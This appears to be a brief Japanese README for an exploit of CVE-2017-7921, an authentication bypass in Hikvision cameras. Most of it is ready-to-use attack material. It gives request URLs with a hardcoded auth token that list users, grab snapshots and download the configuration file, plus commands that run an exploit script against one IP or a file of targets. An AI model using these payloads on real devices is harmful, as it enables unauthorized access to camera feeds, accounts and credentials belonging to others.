
Hikvision デバイスにおいて、不適切な認証の問題が発見されました。
不適切な認証の脆弱性は、アプリケーションがユーザーを適切または正しく認証しない場合に発生します。
これにより、悪意のあるユーザーがシステム上で特権を昇格させ、機密情報にアクセスできる可能性があります。
https://seclists.org/fulldisclosure/2017/Sep/23
脆弱性の詳細:
\----------------------
すべてのユーザーとその役割の一覧を取得します:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
認証なしでカメラのスナップショットを取得します:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
そして最も深刻なのは、カメラ設定をダウンロードできることです:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
